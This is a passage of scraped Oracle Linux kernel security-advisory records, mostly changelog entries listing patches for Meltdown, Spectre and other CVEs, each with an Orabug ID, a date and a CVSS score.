{CVE-2017-5754}\n- kaiser: load_new_mm_cr3() let SWITCH_USER_CR3 flush user (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: enhanced by kernel and user PCIDs (Dave Hansen) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: vmstat show NR_KAISERTABLE as nr_overhead (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: delete KAISER_REAL_SWITCH option (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: name that 0x1000 KAISER_SHADOW_PGD_OFFSET (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: cleanups while trying for gold link (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: kaiser_remove_mapping() move along the pgd (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: tidied up kaiser_add/remove_mapping slightly (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: tidied up asm/kaiser.h somewhat (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: ENOMEM if kaiser_pagetable_walk() NULL (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix perf crashes 
(Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix regs to do_nmi() ifndef CONFIG_KAISER (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: KAISER depends on SMP (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix build and FIXME in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: stack map PAGE_SIZE at THREAD_SIZE-PAGE_SIZE (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: do not set _PAGE_NX on pgd_none (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: merged update (Dave Hansen) [Orabug: 27371653] {CVE-2017-5754}\n- KAISER: Kernel Address Isolation (Richard Fellner) [Orabug: 27371653] {CVE-2017-5754}\n- x86/boot: Add early cmdline parsing for options with arguments (Tom Lendacky) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm/64: Fix reboot interaction with CR4.PCIDE (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Enable CR4.PCIDE on supported systems (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add the 'nopcid' boot option to turn off PCID (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Disable PCID on 32-bit kernels (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Remove the UP asm/tlbflush.h code, always use the (formerly) SMP code (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Reimplement flush_tlb_page() using flush_tlb_mm_range() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Make flush_tlb_mm_range() more predictable (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Remove flush_tlb() and flush_tlb_current_task() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/vm86/32: Switch to flush_tlb_mm_range() in mark_screen_rdonly() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/irq: Do not substract irq_tlb_count from irq_call_count (Aaron Lu) [Orabug: 27371653] {CVE-2017-5754}\n- sched/core: Idle_task_exit() shouldnt use 
switch_mm_irqs_off() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- ARM: Hide finish_arch_post_lock_switch() from modules (Steven Rostedt) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm, sched/core: Turn off IRQs in switch_mm() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm, sched/core: Uninline switch_mm() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Build arch/x86/mm/tlb.c even on !SMP (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- sched/core: Add switch_mm_irqs_off() and use it in the scheduler (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- mm/mmu_context, sched/core: Fix mmu_context.h assumption (Ingo Molnar) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: If INVPCID is available, use it to flush global mappings (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add a 'noinvpcid' boot option to turn off INVPCID (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Fix INVPCID asm constraint (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add INVPCID helpers (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/ibrs: Remove 'ibrs_dump' and remove the pr_debug (Konrad Rzeszutek Wilk) [Orabug: 27351388] \n- kABI: Revert kABI: Make the boot_cpu_data look normal (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n[4.1.12-61.60.1]\n- userns: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- udf: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- net: mpls: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- fs: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- ipv6: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- ipv4: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- Thermal/int340x: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] 
{CVE-2017-5753}\n- cw1200: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- qla2xxx: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- p54: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- carl9170: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- uvcvideo: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- bpf: prevent speculative execution in eBPF interpreter (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- locking/barriers: introduce new observable speculation barrier (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- x86/cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- x86/cpu/AMD: Make the LFENCE instruction serialized (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- kABI: Make the boot_cpu_data look normal. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- kernel.spec: Require the new microcode_ctl. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715} {CVE-2017-5715}\n- x86/microcode/AMD: Add support for fam17h microcode loading (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Disable if running as Xen PV guest. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- Set IBPB when running a different VCPU (Dave Hansen) [Orabug: 27345850] {CVE-2017-5715}\n- Clear the host registers after setbe (Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- Use the ibpb_inuse variable. (Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- KVM: x86: add SPEC_CTRL to MSR and CPUID lists (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- kvm: vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Paolo Bonzini) [Orabug: 27345850] {CVE-2017-5715}\n- Use the 'ibrs_inuse' variable. 
(Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- kvm: svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- x86/svm: Set IBPB when running a different VCPU (Paolo Bonzini) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: Pad RSB on VM transition (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/cpu/AMD: Add speculative control support for AMD (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/microcode: Recheck IBRS and IBPB feature on microcode reload (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Move IBRS/IBPB feature detection to scattered.c (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Add lock to serialize changes to ibrs and ibpb control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: clear registers on VM exit (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: Set IBPB when switching VM (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- *INCOMPLETE* x86/syscall: Clear unused extra registers on syscall entrance (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/entry: Stuff RSB for entry to kernel for non-SMEP platform (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/mm: Only set IBPB when the new thread cannot ptrace current thread (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/mm: Set IBPB upon context switch (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/idle: Disable IBRS when offlining cpu and re-enable on wakeup (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/idle: Disable IBRS entering idle and enable it on wakeup (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: save IBRS MSR value in paranoid_entry (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- *Scaffolding* x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Tim 
Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Add macro that does not save rax, rcx, rdx on stack to disable IBRS (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/enter: MACROS to set/clear IBRS and set IBP (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/feature: Report presence of IBPB and IBRS control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Add STIBP feature enumeration (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/cpufeature: Add X86_FEATURE_IA32_ARCH_CAPS and X86_FEATURE_IBRS_ATT (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/feature: Enable the x86 feature to control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n[4.1.12-61.59.1]\n- nvme: merge probe_work and reset_work (Christoph Hellwig) [Orabug: 26984819] \n- nvme: only ignore hardware errors in nvme_create_io_queues (Christoph Hellwig) [Orabug: 26984819] \n- nvme: add NVME_SC_CANCELLED (Christoph Hellwig) [Orabug: 26984819]\n[4.1.12-61.58.1]\n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27098331] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27098331] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27098331] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27098331] \n- mm: fix new crash in unmapped_area_topdown() (Hugh Dickins) [Orabug: 26338222] {CVE-2017-1000364}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26338222] {CVE-2017-1000364}\n- Revert 'SUNRPC: Refactor svc_set_num_threads()' (Kirtikar Kashyap) [Orabug: 26981903] \n- Revert 'NFSv4: Fix callback 
server shutdown' (Kirtikar Kashyap) [Orabug: 26981903]\n[4.1.12-61.57.1]\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 26681157] {CVE-2017-1000111}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650879] {CVE-2017-9075}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643642] {CVE-2017-11473}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643594] {CVE-2016-10044}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643552] {CVE-2017-11176}\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540282] {CVE-2017-2671}\n- nfsd: encoders mustnt use unitialized values in error cases (J. Bruce Fields) [Orabug: 26572912] {CVE-2017-8797}\n- nfsd: fix undefined behavior in nfsd4_layout_verify (Ari Kauppi) [Orabug: 26572912] {CVE-2017-8797}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643594] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643594] {CVE-2016-10044}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26403981] {CVE-2017-1000365} {CVE-2017-1000365}\n- NFSv4: Fix callback server shutdown (Trond Myklebust) [Orabug: 26403981] {CVE-2017-9059}\n- SUNRPC: Refactor svc_set_num_threads() (Trond Myklebust) [Orabug: 26403981] {CVE-2017-9059}\n[4.1.12-61.56.1]\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26867347] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26867347]\n[4.1.12-61.55.1]\n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796420] {CVE-2017-1000251}\n- blk-mq: avoid re-initialize request which is failed in direct dispatch (Shaohua Li) [Orabug: 26752510] \n- xen-blkfront: fix mq start/stop race (Junxiao Bi) [Orabug: 26739166] [Orabug: 26739166] \n- Added IB diag 
counters from UEK2 (Chris Gray) [Orabug: 26088233]\n[4.1.12-61.54.1]\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26669479] [Orabug: 26645497] {CVE-2017-12134}\n[4.1.12-61.53.1]\n- dentry name snapshots (Al Viro) [Orabug: 26630810] {CVE-2017-7533}\n[4.1.12-61.52.1]\n- KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26585991] {CVE-2016-9604} {CVE-2016-9604}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586044] {CVE-2016-10200}\n- mnt: Add a per mount namespace limit on the number of mounts (Eric W. Biederman) [Orabug: 26585947] {CVE-2016-6213} {CVE-2016-6213}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578193] {CVE-2017-9242}", "modified": "2018-01-27T00:00:00", "published": "2018-01-27T00:00:00", "id": "ELSA-2018-4021", "href": "http://linux.oracle.com/errata/ELSA-2018-4021.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "unix", "description": "[2.6.39-400.298.1]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) [Orabug: 23320090] \n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) [Orabug: 24337879] \n- xen-netfront: cast grant table reference first to type int (Dongli Zhang) [Orabug: 25102637] \n- xen-netfront: do not cast grant table reference to signed short (Dongli Zhang) [Orabug: 25102637] \n- RDS: Print failed rdma op details if failure is remote access error (Rama Nichanamatlu) [Orabug: 25440316] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] {CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric Biggers) [Orabug: 26592013] \n- oracleasm: Copy the integrity descriptor (Martin K. 
Petersen) [Orabug: 26650039] \n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: 26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797307] \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559] \n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] {CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. 
Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643562] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011278] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002453] {CVE-2017-1000111}\n- mlx4_core: calculate log_mtt based on total system memory (Wei Lin Guay) [Orabug: 26867355] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26867355] \n- fs/binfmt_elf.c: fix bug in loading of PIE binaries 
(Michael Davidson) [Orabug: 26870958] {CVE-2017-1000253}\n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796428] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645562] {CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26638926] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz Guzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578202] {CVE-2017-9242}\n- selinux: quiet the filesystem labeling behavior message (Paul Moore) [Orabug: 25721485] \n- RDS/IB: active bonding port state fix for intfs added late (Mukesh Kacker) [Orabug: 25875426] \n- HID: hid-cypress: validate length of report (Greg Kroah-Hartman) [Orabug: 25891914] {CVE-2017-7273}\n- udf: Remove repeated loads blocksize (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Check length of extended attributes and allocation descriptors (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Verify i_size when loading inode (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- btrfs: drop unused parameter from btrfs_item_nr (Ross Kirk) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: cleanup of function where fixup_low_keys() is called (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of fixup_low_keys() (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of btrfs_extend_item() (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: add support for asserts (Josef Bacik) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: make xattr replace operations atomic (Filipe Manana) [Orabug: 
25948102] {CVE-2014-9710}\n- net: validate the range we feed to iov_iter_init() in sys_sendto/sys_recvfrom (Al Viro) [Orabug: 25948149] {CVE-2015-2686}\n- xsigo: Compute node crash on FC failover (Joe Jin) [Orabug: 25965445] \n- PCI: Prevent VPD access for QLogic ISP2722 (Ethan Zhao) [Orabug: 25975513] \n- PCI: Prevent VPD access for buggy devices (Babu Moger) [Orabug: 25975513] \n- ipv4: try to cache dst_entries which would cause a redirect (Hannes Frederic Sowa) [Orabug: 26032377] {CVE-2015-1465}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26326145] {CVE-2017-1000364}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) [Orabug: 26366024] {CVE-2017-7645}\n- dm mpath: allow ioctls to trigger pg init (Mikulas Patocka) [Orabug: 25645229] \n- xen/manage: Always freeze/thaw processes when suspend/resuming (Ross Lagerwall) [Orabug: 25795530] \n- lpfc cannot establish connection with targets that send PRLI under P2P mode (Joe Jin) [Orabug: 25955028]", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "ELSA-2017-3658", "href": "http://linux.oracle.com/errata/ELSA-2017-3658.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:55", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.20.1]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) [Orabug: 25392692] \n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) [Orabug: 26479780] \n- KEYS: fix dereferencing NULL payload with nonzero length (Eric Biggers) [Orabug: 26592025] \n- oracleasm: Copy the integrity descriptor (Martin K. 
Petersen) [Orabug: 26649818] \n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: 26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468] \n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] {CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587] \n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643556] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011273] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002450] {CVE-2017-1000111}\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26883934] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26883934] \n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796364] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645550] {CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26638921] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586047] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz Guzik) [Orabug: 26586022] {CVE-2016-9685}\n- KEYS: 
Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26585994] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578198] {CVE-2017-9242}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) [Orabug: 25507344] {CVE-2016-7097} {CVE-2016-7097}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) [Orabug: 26366022] {CVE-2017-7645}", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3657", "href": "http://linux.oracle.com/errata/ELSA-2017-3657.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "description": "[2.6.39-400.297.12]\n- xsigo: 